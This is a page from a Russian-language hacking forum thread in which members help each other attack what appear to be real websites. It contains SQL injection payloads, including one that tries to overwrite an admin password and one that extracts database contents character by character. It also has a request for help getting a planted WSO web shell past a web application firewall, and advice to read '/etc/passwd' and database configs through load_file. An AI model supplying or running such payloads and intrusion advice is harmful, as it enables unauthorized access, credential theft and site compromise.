Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
Page 1142 of 1207
  1. Hapk

    Hapk Banned

    Joined:
    3 Jun 2011
    Messages:
    290
    Likes Received:
    42
    Reputations:
    -5
    вот так?
    http://site.ru/index.php?id=123'+UNION+SELECT+1,2,3,admin,5,6,7,8,9,10,11,12,13,14,15,16,17,18 UPDATE 'admin' SET 'password' = '123' WHERE username='admin'+--+
     
    #22821 Hapk, 12 Dec 2013
    Last edited: 12 Dec 2013
  2. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    тебе ж сказали, в майскул разделение запросов работать небудет, ты хоть читаешь что тебе пишут или нет?
     
    #22822 qaz, 12 Dec 2013
    1 person likes this.
  3. Hapk

    Hapk Banned

    Joined:
    3 Jun 2011
    Messages:
    290
    Likes Received:
    42
    Reputations:
    -5
    Бля не так просто понял!
     
    #22823 Hapk, 12 Dec 2013
  4. BOSS

    BOSS Member

    Joined:
    15 Jun 2010
    Messages:
    86
    Likes Received:
    5
    Reputations:
    0
    Подскажите какая веб-уязвимости сейчас являются наиболее распространенными? Очень хочется начать изучать веб-уязвимости, но естественно хочу начать с актуального и распространенного.
     
    #22824 BOSS, 13 Dec 2013
  5. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Сбербанк, С count(*) сложнее, но данные можно выводить:
    Code:
    lan=3&pid=0%26(([COLOR=Yellow]1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21[/COLOR])>(SELECT*FROM([COLOR=DarkOrange]SELECT*FROM information_schema.tables LIMIT 1[/COLOR])a1 WHERE @:=[COLOR=Red]ascii(mid(TABLE_SCHEMA,1,1))[/COLOR]))UNION(SELECT @)&type_id=2&raznovid=2&num_set=undefined
    Возвращает код первого символа имени базы данных. Остаться выяснить ограничение длины у фильтра на число и можно приступать. :)

    sabe, Здесь нормальный вывод, не blind. Если у вас получиться упростить запрос - это хорошо, но на некоторых запросах БД может надолго зависнуть, осторожно.
     
    #22825 randman, 13 Dec 2013
    Last edited: 13 Dec 2013
    1 person likes this.
  6. -=Cerberus=-

    -=Cerberus=- κρυπτός γράφω

    Joined:
    29 Apr 2012
    Messages:
    1,321
    Likes Received:
    930
    Reputations:
    391
    Доброго времени суток ачатовцы!

    подскажите как обойти Incapsula WAF
    есть шелл WSO. Пытаясь его открыть, когда как, то пускает, то нет, но оказавшись внутри не могу ничего исполнить сразу ловлю бан. Админки прикрыли, так что шелл последняя зацепка.

    может быть кто нибудь сталкивался с этим зверем и есть решение?

    судя по отчету сравнительного тестирования Incapsula WAF vs CloudFlare пробелы в защите имеются

    ХЭЭЭЛППП МИ!!!

    p.s Эта хрень таскает по всему сайту свои кукисы, может быть валидность вызываемых страниц сайта завязана на поле Referer и этих куках
     
    #22826 -=Cerberus=-, 13 Dec 2013
    Last edited: 13 Dec 2013
  7. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    545
    Likes Received:
    159
    Reputations:
    324
    Code:
    https://e-pay.by/https://e-pay.by/?invaliduser
https://e-pay.by/https://e-pay.by/
https://e-pay.by/https://e-pay.by/news?page=9
    что это такое?
     
    #22827 psihoz26, 14 Dec 2013
  8. MrKloud

    MrKloud New Member

    Joined:
    3 Jan 2012
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Добрый день! Пытаюсь посмотреть, есть ли файловые привилегии у юзера, но пишет, мол в доступе отказано.
     
    #22828 MrKloud, 14 Dec 2013
  9. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    если используешь запрос по выборке и кавычек нет, то к нужной записи в колонке надо хексить, пример:
     
    _________________________
    #22829 winstrool, 14 Dec 2013
  10. MrKloud

    MrKloud New Member

    Joined:
    3 Jan 2012
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    То же самое.
     
    #22830 MrKloud, 14 Dec 2013
  11. zombak18

    zombak18 New Member

    Joined:
    2 Oct 2011
    Messages:
    34
    Likes Received:
    1
    Reputations:
    0
    Как можно записать, чтобы значение было больше определнного..
    К примеру where value=больше50
    Что то понять не могу как это записать :)
     
    #22831 zombak18, 14 Dec 2013
  12. eclipse

    eclipse Member

    Joined:
    19 Dec 2010
    Messages:
    155
    Likes Received:
    74
    Reputations:
    85
    Тебе сюда :)
     
    #22832 eclipse, 14 Dec 2013
  13. zombak18

    zombak18 New Member

    Joined:
    2 Oct 2011
    Messages:
    34
    Likes Received:
    1
    Reputations:
    0
    :D
    догадался после того, как отправил здесь сообщение
     
    #22833 zombak18, 14 Dec 2013
  14. eclipse

    eclipse Member

    Joined:
    19 Dec 2010
    Messages:
    155
    Likes Received:
    74
    Reputations:
    85
    +++ Молодец, прогрессируешь! :D
     
    #22834 eclipse, 14 Dec 2013
  15. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    Посмотрел скуль в личке, все просто))) там просто нет доступа к mysql.user, по этому и нет файловых привилегий! модераторы, почистите от оффтопа
     
    _________________________
    #22835 winstrool, 15 Dec 2013
  16. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    Есть у меня ссылка одна, там есть sql injection, раскрутил, узнал имена бд, лезу в бд а там какие-то тех. данные и больше ничего.
    На самом сайте есть форма авторизации для зареганых пользователей, а вот куда ихние данные могут записываться?
     
    #22836 GhostW, 15 Dec 2013
  17. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    либо плохо искал, либо из файла
     
    #22837 qaz, 15 Dec 2013
  18. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    а к файлу как можно доступ получить? или хотя бы узнать где он?
     
    #22838 GhostW, 15 Dec 2013
  19. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    если файл прив нету то никак
     
    #22839 qaz, 15 Dec 2013
  20. UXOR

    UXOR Member

    Joined:
    16 Aug 2013
    Messages:
    44
    Likes Received:
    7
    Reputations:
    6
    Необязательно, можно попробовать load_file('/etc/passwd'), если сработает можно попробовать прочитать конфиги мускула и тд
     
    #22840 UXOR, 15 Dec 2013
(You must log in or sign up to post here.)
Page 1142 of 1207
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.